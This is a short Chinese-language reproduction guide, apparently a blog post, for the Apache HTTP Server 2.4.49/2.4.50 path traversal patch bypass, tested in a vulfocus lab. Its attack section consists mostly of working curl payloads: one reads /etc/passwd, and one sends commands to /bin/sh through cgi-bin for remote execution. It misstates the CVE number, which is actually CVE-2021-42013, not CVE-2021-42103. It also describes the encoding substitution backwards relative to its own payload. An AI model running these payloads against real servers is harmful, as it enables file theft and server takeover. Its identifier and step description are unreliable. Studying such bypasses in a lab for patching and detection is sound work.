0x01 漏洞简介
CVE-2021-42103是基于Apache官方对2.4.49版本中出现的目录穿越漏洞的补丁的绕过
攻击者可以利用这个漏洞读取任意文件。在开启cgi获取cgid时,可以命令执行
0x02 影响版本
Apache HTTP Server 2.4.49
Apache HTTP Server 2.4.50
0x03 漏洞复现
攻击机:kali
1.环境搭建
此处使用在线搭建平台
地址:vulfocus
访问出现以下图片,说明环境启动成功
2.基于CVE-2021-41773的攻击方法,这次绕过只需要把%32%65替换为%2e就可以
此处是修改好的
在kali中输入以下命令
curl -v --path-as-is 目标地址:端口/icons/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/etc/passwd
出现以下图片说明成功复现
3.目标服务器开启cgi或者cgid时候,可以命令执行
curl -v --data "echo;命令" '目标地址:端口/cgi-bin/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/.%%32%65/bin/sh'
发现执行成功
0x04 漏洞修复
升级至最新版